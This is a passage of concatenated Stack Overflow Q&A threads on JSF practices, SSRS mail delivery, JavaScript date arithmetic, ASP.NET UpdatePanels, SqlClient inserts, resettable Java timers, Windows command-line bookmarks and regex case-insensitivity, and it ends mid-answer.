Q: What are the best practices for JSF? I have done Java and JSP programming in the past, but I am new to JavaServer Faces and want to know if there's a set of best practices for JSF development.

A: Consider using Facelets - it greatly simplifies the worst parts of JSF development. I'm doing a CMS-based JSF project now without Facelets (after doing a project with it) and it feels like my left arm is missing....

A: I would strongly recommend getting someone experienced in JSF to lead your first project in JSF, even if this means paying a contractor for 3 months. The JSF approach is very different to JSP. The way you approach and solve problems is very different.

Libraries - Consider the following libraries:

* Tomahawk
* RichFaces
* Shale
* Trinidad
* Spring

Architecture - Embrace MVC: you need not only to know what this means but to use it extensively. There are two main patterns for associating controllers with the views.

.NET style, one request controller per view: Every top-level page has a request-scoped controller (bean); all validation and actions of the page use this class. It is also used for filtering and ordering the Model. The Model will be stored on a few session-level controllers which will handle talking to the back-end (EJBs, or the persistence layer); these session controllers should implement the business logic and have no knowledge of JSF, HTML or any presentation technology.

Controllers are session level: Design controllers based on your data model and nest them within each other. (This post is getting too long so I won't go into the nuts and bolts of these.)

Knowledge Required - Everyone:

* Life cycle
* MVC
* Component-based development
* Tags in h: and f:

At least one person:

* Creating custom components
* Limitations of JSF (back button, random navigation, etc.)
* Debugging 3rd-party libraries (at least one person has to be comfortable breaking out the debugger and stepping into the implementation of JSF - easiest with open source implementations like MyFaces)

A: Some tips: Understand the JSF request lifecycle and where your various pieces of code fit in it. Especially find out why your model values will not be updated if there are validation errors. Choose a tag library and then stick with it. Take your time to determine your needs and prototype different libraries. Mixing different taglibs may cause severe harm to your mental health.

A: * Add my vote for Facelets. I've recently upgraded a project to use Facelets, and it solves some big issues with JSF, especially giving you a decent template system right out of the box and letting you use standard HTML when it is appropriate, without wrapping it in "verbatim" tags. * RestFaces is a solution to the GET/POST problem that many people complain about. It's also well documented and easy to use. * Don't use too many taglibs. It makes the job a lot harder when upgrading. * SEAM collects many of the JSF best practices, but I haven't used it yet, so I can't really recommend it - I just recommend you take a look at it.

A: I have been using the IBM implementation of JSF and have some comments. It is not a bad way to go, but you have to commit to the IBM 'way of life'. They have written their own tag lib which extends the JSF standard. If you can manage to stay inside of Rational Application Developer (RAD) (which does not get updated THAT often), the integration is sometimes buggy but overall decent. Also the integration with WebSphere is pretty good. Unless your employer plays golf with IBM, I think it is better to stay as vanilla as possible. 
A: I am not yet aware of a "best practice" for cross-field / form-level validation. That is, JSF validation is currently oriented to single-field validation. IMO it gets ugly when you look at complex cross-field / form-level validation. Old, but still looks accurate to me: http://weblogs.java.net/blog/johnreynolds/archive/2004/07/improve_jsf_by_1.html http://www.jroller.com/robwilliams/entry/jsf_multi_field_validation_not

A: You could check the following link, where you'll find interesting articles: http://www.jsftutorials.net/

A: Select a good component library. Do not use RichFaces; I suggest you don't use JSF at all - use Spring MVC with jQuery for the view and JSON in a REST architecture. But if you have to, use PrimeFaces: it is easy to use and has enough components.
{ "language": "en", "url": "https://stackoverflow.com/questions/31924", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "11" }
Q: Sending e-mail from a Custom SQL Server Reporting Services Delivery Extension I've developed my own delivery extension for Reporting Services 2005, to integrate this with our SaaS marketing solution. It takes the subscription, and takes a snapshot of the report with a custom set of parameters. It then renders the report and sends an e-mail with a link and the report attached as XLS. Everything works fine, until mail delivery... Here's my code for sending e-mail:

public static List<string> SendMail(SubscriptionData data, Stream reportStream, string reportName, string smptServerHostname, int smtpServerPort)
{
    List<string> failedRecipients = new List<string>();
    MailMessage emailMessage = new MailMessage(data.ReplyTo, data.To);
    emailMessage.Priority = data.Priority;
    emailMessage.Subject = data.Subject;
    emailMessage.IsBodyHtml = false;
    emailMessage.Body = data.Comment;

    if (reportStream != null)
    {
        Attachment reportAttachment = new Attachment(reportStream, reportName);
        emailMessage.Attachments.Add(reportAttachment);
        reportStream.Dispose();
    }

    try
    {
        SmtpClient smtp = new SmtpClient(smptServerHostname, smtpServerPort);

        // Send the MailMessage
        smtp.Send(emailMessage);
    }
    catch (SmtpFailedRecipientsException ex)
    {
        // Delivery failed for the recipient. Add the e-mail address to the failedRecipients List
        failedRecipients.Add(ex.FailedRecipient);
    }
    catch (SmtpFailedRecipientException ex)
    {
        // Delivery failed for the recipient. Add the e-mail address to the failedRecipients List
        failedRecipients.Add(ex.FailedRecipient);
    }
    catch (SmtpException ex)
    {
        throw ex;
    }
    catch (Exception ex)
    {
        throw ex;
    }

    // Return the List of failed recipient e-mail addresses, so the client can maintain its list.
    return failedRecipients;
}

The value for smptServerHostname is localhost, and the port is 25. I verified that I can actually send mail by using Telnet. And it works. Here's the error message I get from SSRS:

ReportingServicesService!notification!4!08/28/2008-11:26:17:: Notification 6ab32b8d-296e-47a2-8d96-09e81222985c completed. Success: False, Status: Exception Message: Failure sending mail. Stacktrace: at MyDeliveryExtension.MailDelivery.SendMail(SubscriptionData data, Stream reportStream, String reportName, String smptServerHostname, Int32 smtpServerPort) in C:\inetpub\wwwroot\CustomReporting\MyDeliveryExtension\MailDelivery.cs:line 48 at MyDeliveryExtension.MyDelivery.Deliver(Notification notification) in C:\inetpub\wwwroot\CustomReporting\MyDeliveryExtension\MyDelivery.cs:line 153, DeliveryExtension: My Delivery, Report: Clicks Development, Attempt 1 ReportingServicesService!dbpolling!4!08/28/2008-11:26:17:: NotificationPolling finished processing item 6ab32b8d-296e-47a2-8d96-09e81222985c

Could this have something to do with Trust/Code Access Security? My delivery extension is granted full trust in rssrvpolicy.config:

<CodeGroup class="UnionCodeGroup"
           version="1"
           PermissionSetName="FullTrust"
           Name="MyDelivery_CodeGroup"
           Description="Code group for MyDelivery extension">
    <IMembershipCondition class="UrlMembershipCondition"
                          version="1"
                          Url="C:\Program Files\Microsoft SQL Server\MSSQL.2\Reporting Services\ReportServer\bin\MyDeliveryExtension.dll" />
</CodeGroup>

Could trust be an issue here? Another theory: SQL Server and SSRS were installed in the security context of Local System. Am I right, or is this service account restricted from accessing any network resource? Even its own SMTP server? I tried changing all SQL Server service logons to Administrator - but still without any success. 
I also tried logging onto the SMTP server in my code, by providing:

NetworkCredential("Administrator", "password")

and also

NetworkCredential("Administrator", "password", "MyRepServer")

Can anyone help here, please?

A: What's at these two lines?

at MyDeliveryExtension.MailDelivery.SendMail(SubscriptionData data, Stream reportStream, String reportName, String smptServerHostname, Int32 smtpServerPort) in C:\inetpub\wwwroot\CustomReporting\MyDeliveryExtension\MailDelivery.cs:line 48
at MyDeliveryExtension.MyDelivery.Deliver(Notification notification) in C:\inetpub\wwwroot\CustomReporting\MyDeliveryExtension\MyDelivery.cs:line 153

Also, you seem to be disposing the report stream, but that should be done by whatever opened that stream, not your method (it won't be obvious that attaching a stream disposes it). You're losing part of your stack trace due to how you re-throw exceptions. Don't throw the ex variable; just throw is enough. Try this tweak:

public static List<string> SendMail(SubscriptionData data, Stream reportStream, string reportName, string smptServerHostname, int smtpServerPort)
{
    List<string> failedRecipients = new List<string>();
    MailMessage emailMessage = new MailMessage(data.ReplyTo, data.To)
    {
        Priority = data.Priority,
        Subject = data.Subject,
        IsBodyHtml = false,
        Body = data.Comment
    };

    if (reportStream != null)
        emailMessage.Attachments.Add(new Attachment(reportStream, reportName));

    try
    {
        SmtpClient smtp = new SmtpClient(smptServerHostname, smtpServerPort);

        // Send the MailMessage
        smtp.Send(emailMessage);
    }
    catch (SmtpFailedRecipientsException ex)
    {
        // Delivery failed for the recipient. Add the e-mail address to the failedRecipients List
        failedRecipients.Add(ex.FailedRecipient);
        // are you missing a loop here? only one failed address will ever be returned
    }
    catch (SmtpFailedRecipientException ex)
    {
        // Delivery failed for the recipient. Add the e-mail address to the failedRecipients List
        failedRecipients.Add(ex.FailedRecipient);
    }

    // Return the List of failed recipient e-mail addresses, so the client can maintain its list.
    return failedRecipients;
}

A: I tried to remove the reportStream attachment:

//if (reportStream != null)
//    emailMessage.Attachments.Add(new Attachment(reportStream, reportName));

And now it works fine. So it is something to do with the reportStream.

A: After fooling around with the functionality that gets the reportStream, I was able to fix the mail sending problem. The error wasn't in the SendMail method, but somewhere else. The exception was thrown in the context of SendMail, though. Buggered!

A: That's why you have to avoid:

catch (Exception ex)
{
    throw ex;
}

as that rethrows the exception with a new stack trace, hiding where it really came from. If you use:

catch (Exception ex)
{
    throw; //note: no ex
}

it keeps the original exception and stack trace.

A:

// Render the report and write the first output file to disk.
RenderedOutputFile[] m_files = notification.Report.Render(format, null);
RenderedOutputFile m_renderedOutputFile = m_files[0];

FileStream m_fileStream = new FileStream(fileName, FileMode.Create, FileAccess.Write);
m_renderedOutputFile.Data.Seek(0, SeekOrigin.Begin);

byte[] arr = new byte[(int)m_renderedOutputFile.Data.Length];
m_renderedOutputFile.Data.Read(arr, 0, (int)m_renderedOutputFile.Data.Length);
m_fileStream.Write(arr, 0, (int)m_renderedOutputFile.Data.Length);
m_fileStream.Close();
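One way to sidestep the stream-lifetime problem discussed above is to copy the rendered report into a MemoryStream that the attachment owns, so disposing the original report stream can no longer break the send. A minimal sketch (the helper name is made up for illustration; the Attachment and MemoryStream behaviour is standard System.Net.Mail / System.IO):

using System.IO;
using System.Net.Mail;

static Attachment CreateAttachment(Stream reportStream, string reportName)
{
    // Copy the report into a private buffer so the caller can
    // dispose the original stream whenever it likes.
    MemoryStream buffer = new MemoryStream();
    byte[] chunk = new byte[8192];
    int read;
    while ((read = reportStream.Read(chunk, 0, chunk.Length)) > 0)
    {
        buffer.Write(chunk, 0, read);
    }
    buffer.Position = 0; // rewind so SmtpClient reads from the start
    return new Attachment(buffer, reportName);
}

The caller stays responsible for the original report stream; the MemoryStream is disposed along with the MailMessage when the message is disposed.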
{ "language": "en", "url": "https://stackoverflow.com/questions/31930", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "2" }
Q: What's the simplest way to decrement a date in Javascript by 1 day? I need to decrement a Javascript date by 1 day, so that it rolls back across months/years correctly. That is, if I have a date of 'Today', I want to get the date for 'Yesterday'. It always seems to take more code than necessary when I do this, so I'm wondering if there's any simpler way. What's the simplest way of doing this? [Edit: Just to avoid confusion in an answer below, this is a JavaScript question, not a Java one.]

A:

var today = new Date();
var yesterday = new Date();
yesterday.setDate(today.getDate() - 1);

(Note that setDate returns a millisecond timestamp, not a Date, so assigning new Date().setDate(...) directly to a variable would give you a number rather than a Date object.)

A:

day.setDate(day.getDate() - 1); // can return the wrong day

This can return the wrong day. Under UTC-03:00, check:

var d = new Date(2014, 9, 19);
d.setDate(d.getDate() - 1); // will return Oct 17

Better use:

var n = day.getTime();
n -= 86400000;
day = new Date(n); // works fine for everything

A: getDate()-1 should do the trick. Quick example:

var day = new Date("January 1 2008");
day.setDate(day.getDate() - 1);
alert(day);

A:

origDate = new Date();
decrementedDate = new Date(origDate.getTime() - (86400 * 1000));
console.log(decrementedDate);

A:

var d = new Date();
d.setDate(d.getDate() - 1);
console.log(d);

A: setDate(dayValue) - dayValue is an integer from 1 to 31, representing the day of the month. From https://developer.mozilla.org/en/Core_JavaScript_1.5_Reference/Global_Objects/Date/setDate The behaviour solving your problem (and mine) seems to be outside the specified range. What seem to be needed are addDate(), addMonth(), addYear() ... functions.

A: Working with dates in JS can be a headache, so the simplest way is to use moment.js for any date operations. To subtract one day:

const date = moment().subtract(1, 'day')
{ "language": "en", "url": "https://stackoverflow.com/questions/31931", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "23" }
Q: ASP.NET AJAX: Firing an UpdatePanel after the page load is complete I'm sure this is easy but I can't figure it out: I have an ASP.NET page with some UpdatePanels on it. I want the page to load completely, with some 'Please wait' text in the UpdatePanels. Then, once the page is completely loaded, I want to call a code-behind function to update the UpdatePanel. Any ideas as to what combination of Javascript and code-behind I need to implement this idea? SAL PS: I've tried putting my function call in Page_Load, but then the code is run before the page is delivered and, as the function I want to run takes some time, the page simply takes too long to load up.

A: I fiddled around with the ScriptManager suggestions - which I reckon I would have eventually got working - but it seems to me that the Timer idea is easier to implement and not really(!) that much of a hack?! Here's how I got my panel updated after the initial page render was complete...

default.aspx:

<%@ Page Language="C#" AutoEventWireup="true" CodeBehind="Default.aspx.cs" Inherits="AJAXPostLoadCall._Default" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head runat="server">
    <title>Untitled Page</title>
</head>
<body>
    <form id="form1" runat="server">
    <h2>And now for a magic trick...</h2>
    <asp:ScriptManager ID="ScriptManager1" runat="server" EnablePartialRendering="True">
    </asp:ScriptManager>
    <div>
        <asp:UpdatePanel ID="UpdatePanel1" runat="server">
            <ContentTemplate>
                <asp:Timer ID="Timer1" runat="server" Interval="2000" ontick="Timer1_Tick" />
                <asp:Label ID="Label1" runat="server">Something magic is about to happen...</asp:Label>
            </ContentTemplate>
        </asp:UpdatePanel>
    </div>
    </form>
</body>
</html>

and the code-behind default.aspx.cs reads:

using System;
using System.Collections;
using System.Configuration;
using System.Data;
using System.Linq;
using System.Web;
using System.Web.Security;
using System.Web.UI;
using System.Web.UI.HtmlControls;
using System.Web.UI.WebControls;
using System.Web.UI.WebControls.WebParts;
using System.Xml.Linq;

namespace AJAXPostLoadCall
{
    public partial class _Default : System.Web.UI.Page
    {
        protected void Page_Load(object sender, EventArgs e)
        {
        }

        public void DoMagic()
        {
            Label1.Text = "Abracadabra";
        }

        protected void Timer1_Tick(object sender, EventArgs e)
        {
            // Do the magic, then disable the timer
            DoMagic();
            Timer1.Enabled = false;
        }
    }
}

So, the page loads up and the Timer (contained within the UpdatePanel) fires 2000 ms after the page has loaded (I think - I'm not sure when the Timer actually starts?). The label text is rewritten and then the Timer is disabled to stop any more updates. Simple enough - but can you purists out there tell me if this is a Horrible Hack?

A: Have a look at ScriptManager.RegisterStartupScript. The idea is that you register a script to run on startup (I believe once the page has loaded). Your script should call a function that causes a postback through your UpdatePanel.

A: Use a timer control that is fired after a certain number of milliseconds (enough for the page to load). In the timer tick event, refresh the update panel.

A: Doing things like this with UpdatePanels rather than something easily understandable WILL bite you; it's just a matter of when.

A: From the very first question on this post, I think what the user is looking for is a message to be displayed to the user while the update panel loads. 
Just put an UpdateProgress control like the one below on your page, just above your UpdatePanel control, and feel free to trigger an event in your UpdatePanel; put your backend code as usual, and whatever is contained inside the UpdateProgress control will show while your UpdatePanel content is being processed in the backend.

<asp:UpdateProgress AssociatedUpdatePanelID="UpdatePanel1" ID="UpdateProgress1" runat="server">
    <ProgressTemplate>
        <div class="mystyleclass">
            Please Wait...
        </div>
    </ProgressTemplate>
</asp:UpdateProgress>

There is no need for any messy manual javascript stuff.

A: ScriptManager.RegisterStartupScript allows a script to run on startup inside of an update panel. If you use the old ClientScript.RegisterStartupScript, then the script you render will be outside the bounds of the update panel, and thus won't be executed during async page loads.

A: Using Tom's approach with the startup script, you can then call:

__doPostBack('UpdatePanelName', '');

A: A thumbs-up and thanks to SAL and the rest of you guys. This solved a big issue I had; my procedure was taking up to a minute for the page to finally render and display. Thanks!
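Putting the RegisterStartupScript and __doPostBack suggestions together, the code-behind might look something like the sketch below. The control IDs and Page_Load wiring are illustrative, and depending on your naming containers you may need the panel's UniqueID rather than ClientID as the postback target:

protected void Page_Load(object sender, EventArgs e)
{
    if (!IsPostBack)
    {
        // First (full) render: queue a client-side script that immediately
        // posts back through the UpdatePanel once the page has loaded.
        string script = "__doPostBack('" + UpdatePanel1.ClientID + "', '');";
        ScriptManager.RegisterStartupScript(this, GetType(), "kickoff", script, true);
    }
    else
    {
        // Async postback: now it is safe to do the slow work.
        DoMagic();
    }
}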
{ "language": "en", "url": "https://stackoverflow.com/questions/31935", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "9" }
Q: C# - SQLClient - Simplest INSERT I'm basically trying to figure out the simplest way to perform your basic insert operation in C#.NET using the SqlClient namespace. I'm using SqlConnection for my db link, I've already had success executing some reads, and I want to know the simplest way to insert data. I'm finding what seem to be pretty verbose methods when I google.

A: Since you seem to be just getting started with this, now is the best time to familiarize yourself with the concept of a Data Access Layer (obligatory wikipedia link). It will be very helpful for you down the road when your apps have more interaction with the database throughout and you want to minimize code duplication. It also makes for more consistent behavior, making testing and tons of other things easier.

A:

using (var conn = new SqlConnection(yourConnectionString))
{
    var cmd = new SqlCommand("insert into Foo values (@bar)", conn);
    cmd.Parameters.AddWithValue("@bar", 17);
    conn.Open();
    cmd.ExecuteNonQuery();
}

A:

using (SqlConnection myConnection = new SqlConnection("Your connection string"))
{
    SqlCommand myCommand = new SqlCommand("INSERT INTO ... VALUES ...", myConnection);
    myConnection.Open();
    myCommand.ExecuteNonQuery();
}
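If you also need the database-generated key back from the insert, a common variation on the parameterized example above is to append SELECT SCOPE_IDENTITY() and call ExecuteScalar instead of ExecuteNonQuery. A sketch (the Foo/Bar names are placeholders, and the key column is assumed to be an IDENTITY):

using (var conn = new SqlConnection(yourConnectionString))
using (var cmd = new SqlCommand(
    "insert into Foo (Bar) values (@bar); select scope_identity();", conn))
{
    cmd.Parameters.AddWithValue("@bar", 17);
    conn.Open();
    // SCOPE_IDENTITY() comes back as a decimal, hence the conversion.
    int newId = Convert.ToInt32(cmd.ExecuteScalar());
}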
{ "language": "en", "url": "https://stackoverflow.com/questions/32000", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "10" }
Q: Resettable Java Timer I'd like to have a java.util.Timer with a resettable timeout in Java. I need to set a one-off event to occur in X seconds. If nothing happens between the time the timer was created and X seconds, then the event occurs as normal. If, however, before X seconds have elapsed, I decide that the event should occur after Y seconds instead, then I want to be able to tell the timer to reset its time so that the event occurs in Y seconds. E.g. the timer should be able to do something like:

Timer timer = new Timer();
timer.schedule(timerTask, 5000); // Timer starts in 5000 ms (X)

// At some point between 0 and 5000 ms...
setNewTime(timer, 8000); // timerTask will fire 8000 ms from NOW (Y).

I don't see a way to do this using java.util.Timer, as once you call cancel() you cannot schedule it again. The only way I've come close to replicating this behavior is by using javax.swing.Timer; it involves stopping the original timer and creating a new one, i.e.:

timer.stop();
timer = new Timer(8000, ActionListener);
timer.start();

Is there an easier way??

A: According to the Timer documentation, in Java 1.5 onwards you should prefer the ScheduledThreadPoolExecutor instead. (You may like to create this executor using Executors.newSingleThreadScheduledExecutor() for ease of use; it creates something much like a Timer.) The cool thing is, when you schedule a task (by calling schedule()), it returns a ScheduledFuture object. You can use this to cancel the scheduled task. You're then free to submit a new task with a different triggering time. ETA: The Timer documentation linked to doesn't say anything about ScheduledThreadPoolExecutor; however, the OpenJDK version had this to say: "Java 5.0 introduced the java.util.concurrent package and one of the concurrency utilities therein is the ScheduledThreadPoolExecutor which is a thread pool for repeatedly executing tasks at a given rate or delay. It is effectively a more versatile replacement for the Timer/TimerTask combination, as it allows multiple service threads, accepts various time units, and doesn't require subclassing TimerTask (just implement Runnable). Configuring ScheduledThreadPoolExecutor with one thread makes it equivalent to Timer."

A: The whole code snippet goes like this... 
I hope it will be helpful.

Runnable r = new ScheduleTask();
ReschedulableTimer rescheduleTimer = new ReschedulableTimer();
rescheduleTimer.schedule(r, 10 * 1000);

public class ScheduleTask implements Runnable {
    public void run() {
        // Do scheduled task
    }
}

class ReschedulableTimer extends Timer {
    private Runnable task;
    private TimerTask timerTask;

    public void schedule(Runnable runnable, long delay) {
        task = runnable;
        timerTask = new TimerTask() {
            public void run() {
                task.run();
            }
        };
        this.schedule(timerTask, delay);
    }

    public void reschedule(long delay) {
        System.out.println("rescheduling after seconds " + delay);
        timerTask.cancel();
        timerTask = new TimerTask() {
            public void run() {
                task.run();
            }
        };
        this.schedule(timerTask, delay);
    }
}

A: If your Timer is only ever going to have one task to execute, then I would suggest subclassing it:

import java.util.Timer;
import java.util.TimerTask;

public class ReschedulableTimer extends Timer {
    private Runnable task;
    private TimerTask timerTask;

    public void schedule(Runnable runnable, long delay) {
        task = runnable;
        timerTask = new TimerTask() {
            @Override
            public void run() {
                task.run();
            }
        };
        this.schedule(timerTask, delay);
    }

    public void reschedule(long delay) {
        timerTask.cancel();
        timerTask = new TimerTask() {
            @Override
            public void run() {
                task.run();
            }
        };
        this.schedule(timerTask, delay);
    }
}

You will need to work on the code to add checks for misuse, but it should achieve what you want. The ScheduledThreadPoolExecutor does not seem to have built-in support for rescheduling existing tasks either, but a similar approach should work there as well.

A: Do you need to schedule a recurring task? In that case I recommend you consider using Quartz.

A: I don't think it's possible to do it with Timer/TimerTask, but depending on what exactly you want to achieve you might be happy with using java.util.concurrent.ScheduledThreadPoolExecutor.

A: This is what I'm trying out. I have a class that polls a database every 60 seconds using a TimerTask. In my main class, I keep the instance of the Timer and an instance of my local subclass of TimerTask. The main class has a method to set the polling interval (say, going from 60 to 30). In it, I cancel my TimerTask (which is my subclass, where I overrode the cancel() method to do some cleanup, but that shouldn't matter) and then make it null. I recreate a new instance of it, and schedule the new instance at the new interval in the existing Timer. Since the Timer itself isn't cancelled, the thread it was using stays active (and so would any other TimerTasks inside it), and the old TimerTask is replaced with a new one, which happens to be the same, but VIRGIN (since the old one would have been executed or scheduled, it is no longer VIRGIN, as required for scheduling). When I want to shut down the entire timer, I cancel and null the TimerTask (same as I did when changing the timing, again for cleaning up resources in my subclass of TimerTask), and then I cancel and null the Timer itself.

A: Here is an example of a resettable timer. Try to change it for your convenience...

package com.tps.ProjectTasks.TimeThread;

import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.text.SimpleDateFormat;
import java.util.Date;
import java.util.Timer;
import java.util.TimerTask;

/**
 * Simple demo that uses java.util.Timer to schedule a task to execute
 * every 5 seconds, and delays it if you give any input in the console.
 */
public class DateThreadScheduler extends Thread {
    Timer timer;
    BufferedReader br;
    String data = null;
    Date dNow;
    SimpleDateFormat ft;

    public DateThreadScheduler() {
        timer = new Timer();
        timer.schedule(new RemindTask(), 0, 5 * 1000);
        br = new BufferedReader(new InputStreamReader(System.in));
        start();
    }

    public void run() {
        while (true) {
            try {
                data = br.readLine();
                if (data != null && !data.trim().equals("")) {
                    timer.cancel();
                    timer = new Timer();
                    dNow = new Date();
                    ft = new SimpleDateFormat("E yyyy.MM.dd 'at' hh:mm:ss a zzz");
                    System.out.println("Modified Current Date ------> " + ft.format(dNow));
                    timer.schedule(new RemindTask(), 5 * 1000, 5 * 1000);
                }
            } catch (IOException e) {
                e.printStackTrace();
            }
        }
    }

    public static void main(String args[]) {
        System.out.format("Printing the time and date was started...\n");
        new DateThreadScheduler();
    }
}

class RemindTask extends TimerTask {
    Date dNow;
    SimpleDateFormat ft;

    public void run() {
        dNow = new Date();
        ft = new SimpleDateFormat("E yyyy.MM.dd 'at' hh:mm:ss a zzz");
        System.out.println("Current Date: " + ft.format(dNow));
    }
}

This example prints the current date and time every 5 seconds, but if you give any input in the console the timer is delayed and the schedule restarts...

A: I made my own timer class for a similar purpose; feel free to use it:

public class ReschedulableTimer extends Timer {
    private Runnable mTask;
    private TimerTask mTimerTask;

    public ReschedulableTimer(Runnable runnable) {
        this.mTask = runnable;
    }

    public void schedule(long delay) {
        if (mTimerTask != null)
            mTimerTask.cancel();

        mTimerTask = new TimerTask() {
            @Override
            public void run() {
                mTask.run();
            }
        };
        this.schedule(mTimerTask, delay);
    }
}
{ "language": "en", "url": "https://stackoverflow.com/questions/32001", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "40" }
Q: Tool for commandline "bookmarks" on windows? I'm searching for a tool which allows me to specify some folders as "bookmarks" and then access them on the command line (on Windows XP) via a keyword. Something like:

C:\> go home
D:\profiles\user\home\> go svn-project1
D:\projects\project1\svn\branch\src\>

I'm currently using a bunch of batch files, but editing them by hand is a daunting task. On Linux there is cdargs or shell bookmarks, but I haven't found something similar on Windows. Thanks for the Powershell suggestion, but I'm not allowed to install it on my box at work, so it should be a "classic" cmd.exe solution.

A: I was looking for this exact functionality, for simple cases. Couldn't find a solution, so I made one myself:

@ECHO OFF
REM Source found on https://github.com/DieterDePaepe/windows-scripts
REM Please share any improvements made!

REM Folder where all links will end up
set WARP_REPO=%USERPROFILE%\.warp

IF [%1]==[/?] GOTO :help
IF [%1]==[--help] GOTO :help
IF [%1]==[/create] GOTO :create
IF [%1]==[/remove] GOTO :remove
IF [%1]==[/list] GOTO :list

set /p WARP_DIR=<%WARP_REPO%\%1
cd %WARP_DIR%
GOTO :end

:create
IF [%2]==[] (
    ECHO Missing name for bookmark
    GOTO :EOF
)
if not exist %WARP_REPO%\NUL mkdir %WARP_REPO%
ECHO %cd% > %WARP_REPO%\%2
ECHO Created bookmark "%2"
GOTO :end

:list
dir %WARP_REPO% /B
GOTO :end

:remove
IF [%2]==[] (
    ECHO Missing name for bookmark
    GOTO :EOF
)
if not exist %WARP_REPO%\%2 (
    ECHO Bookmark does not exist: %2
    GOTO :EOF
)
del %WARP_REPO%\%2
GOTO :end

:help
ECHO Create or navigate to folder bookmarks.
ECHO.
ECHO warp /?                  Display this help
ECHO warp [bookmark]          Navigate to existing bookmark
ECHO warp /remove [bookmark]  Remove an existing bookmark
ECHO warp /create [bookmark]  Create a bookmark for the current folder
ECHO warp /list               List existing bookmarks
ECHO.

:end

You can list, create and delete bookmarks. The bookmarks are stored in text files in a folder in your user directory. Usage (copied from the current version): A folder bookmarker for use in the terminal.

c:\Temp>warp /create temp     # Create a new bookmark
Created bookmark "temp"
c:\Temp>cd c:\Users\Public    # Go somewhere else
c:\Users\Public>warp temp     # Go to the stored bookmark
c:\Temp>

Every warp uses a pushd command, so you can trace back your steps using popd.

c:\Users\Public>warp temp
c:\Temp>popd
c:\Users\Public>

Open a folder of a bookmark in explorer using warp /window <bookmark>. List all available options using warp /?.

A: With just a batch file, try this... (save as filename "go.bat")

@echo off
set BookMarkFolder=c:\data\cline\bookmarks\
if exist %BookMarkFolder%%1.lnk start %BookMarkFolder%%1.lnk
if exist %BookMarkFolder%%1.bat start %BookMarkFolder%%1.bat
if exist %BookMarkFolder%%1.vbs start %BookMarkFolder%%1.vbs
if exist %BookMarkFolder%%1.URL start %BookMarkFolder%%1.URL

Any shortcuts, batch files, VBS scripts or Internet shortcuts you put in your bookmark folder (in this case "c:\data\cline\bookmarks\") can then be opened / accessed by typing "go bookmarkname". E.g. I have a bookmark called "stack.url"; typing go stack takes me straight to this page. You may also want to investigate Launchy.

A: With PowerShell you could add the folders as variables in your profile.ps1 file, like:

$vids="C:\Users\mabster\Videos"

Then, like Unix, you can just refer to the variables in your commands:

cd $vids

Having a list of variable assignments in the one ps1 file is probably easier than maintaining separate batch files. 
A: What you are looking for is called DOSKEY. You can use the doskey command to create macros in the command interpreter. For example:

doskey mcd=mkdir "$*"$Tpushd "$*"

creates a new command "mcd" that creates a new directory and then changes to that directory (I prefer "pushd" to "cd" in this case because it lets me use "popd" later to go back to where I was before). The $* will be replaced with the remainder of the command line after the macro, and the $T is used to delimit the two different commands that I want to evaluate. If I typed:

mcd foo/bar

at the command line, it would be equivalent to:

mkdir "foo/bar"&pushd "foo/bar"

The next step is to create a file that contains a set of macros which you can then import by using the /macrofile switch. I have a file (c:\tools\doskey.macros) which defines the commands that I regularly use. Each macro should be specified on a line with the same syntax as above. But you don't want to have to manually import your macros every time you launch a new command interpreter. To make it happen automatically, just open up the registry key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\AutoRun and set the value to be doskey /macrofile "c:\tools\doskey.macros". Doing this will make sure that your macros are automatically predefined every time you start a new interpreter. Extra thoughts:

- If you want to do other things in AutoRun (like set environment parameters), you can delimit the commands with an ampersand. Mine looks like: set root=c:\SomeDir&doskey /macrofile "c:\tools\doskey.macros"
- If you prefer that your AutoRun settings be set per-user, you can use the HKCU node instead of HKLM.
- You can also use doskey to control things like the size of the command history.
- I like to end all of my navigation macros with \$* so that I can chain things together.
- Be careful to add quotes as appropriate in your macros if you want to be able to handle paths with spaces in them.

A: Another alternative approach you may want to consider is to have a folder that contains symlinks to each of your projects or frequently-used directories. So you can do something like:

cd \go\svn-project-1
cd \go\my-documents

Symlinks can be made on an NTFS disk using the Junction tool.

A: Without Powershell you can do it like this:

C:\>set DOOMED=c:\windows

C:\>cd %DOOMED%
C:\WINDOWS>

A: Crono wrote: "Are environment variables defined via 'set' not meant for the current session only? Can I persist them?" They are set for the current process, and by default inherited by any process that it creates. They are not persisted to the registry. Their scope can be limited in cmd scripts with "setlocal" (and "endlocal").

A: Environment variables?

set home=D:\profiles\user\home
set svn-project1=D:\projects\project1\svn\branch\src
cd %home%

On Unix I use this along with popd/pushd/cd - all the time.
{ "language": "en", "url": "https://stackoverflow.com/questions/32003", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "12" }
Q: Is regex case insensitivity slower? Source: "RegexOptions.IgnoreCase is more expensive than I would have thought (eg, should be barely measurable)". Assuming that this applies to PHP, Python, Perl, Ruby etc. as well as C# (which is what I assume Jeff was using), how much of a slowdown is it, and will I incur a similar penalty with /[a-zA-Z]/ as I will with /[a-z]/i?

A: Yes, [A-Za-z] will be much faster than setting RegexOptions.IgnoreCase, largely because of Unicode strings. But it's also much more limiting - [A-Za-z] does not match accented international characters; it's literally the A-Za-z ASCII set and nothing more. I don't know if you saw Tim Bray's answer to my message, but it's a good one:

